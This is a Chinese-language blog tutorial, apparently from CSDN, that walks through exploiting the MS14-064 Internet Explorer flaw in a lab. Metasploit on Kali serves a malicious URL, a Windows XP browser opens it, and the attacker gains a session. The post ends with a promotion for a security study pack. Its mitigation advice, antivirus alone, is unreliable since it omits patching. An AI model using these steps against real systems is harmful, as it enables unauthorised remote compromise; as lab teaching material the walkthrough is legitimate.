本次内容详解ms14-064漏洞利用与加固。**
任务环境说明:
渗透机:Kali Linux
靶机:Microsoft Windows XP
渗透机IP:172.16.7.122
靶机IP:172.16.7.120
实验步骤实战
1.打开网络拓扑 进入msfconsole渗透测试平台
2.输入命令 search ms14-064 搜索模块,并用use 调节 输入此下面红色模块
3.输入 show options查看配置所需的参数
4.输入 set SRVHOST命令来设置本地监听的地址 注:SRVHOST监听 kali是不区分大小写的
5.输入 set SRVORT 设置本地监听端口
6.输入 set URIPATH 来设置所利用的网站路径
7.输入 set payload +攻击模块 来设置攻击
8.输入 set LHOST 来设置攻击机IP地址
9.输入set options最后重新查看所设置的参数 都设置完毕了没有
10.最后输入攻击命令 run或exploit来进行漏洞模块攻击
11. run成功后已生成URL,本测试生成URL为:http://172.16.7.122:8080/
下面我们转到Windows XP这里 用ie浏览器输入已生成的URL 回车即可
12.我们重新切换到攻击机这里, 已经入侵成功了 我们随便输入几个命令来看一下,输入 dir 来显示当前目录内容
13.输入 sessions -i来查看当前活跃会话
好了这是ms14-064的漏洞渗透实验,预防此漏洞 在系统中安装杀毒软件来加固自己的操作系统即可
本次实验结束,此文章经供参考,大家切勿利用做违法法律行为, 安全合理上网。
学习计划安排
我一共划分了六个阶段,但并不是说你得学完全部才能上手工作,对于一些初级岗位,学到第三四个阶段就足矣~
这里我整合并且整理成了一份【282G】的网络安全从零基础入门到进阶资料包,需要的小伙伴可以扫描下方CSDN官方合作二维码免费领取哦,无偿分享!!!
如果你对网络安全入门感兴趣,那么你需要的话可以
点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!
①网络安全学习路线
②上百份渗透测试电子书
③安全攻防357页笔记
④50份安全攻防面试指南
⑤安全红队渗透工具包
⑥HW护网行动经验总结
⑦100个漏洞实战案例
⑧安全大厂内部视频资源
⑨历年CTF夺旗赛题解析
扫一扫
3892
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
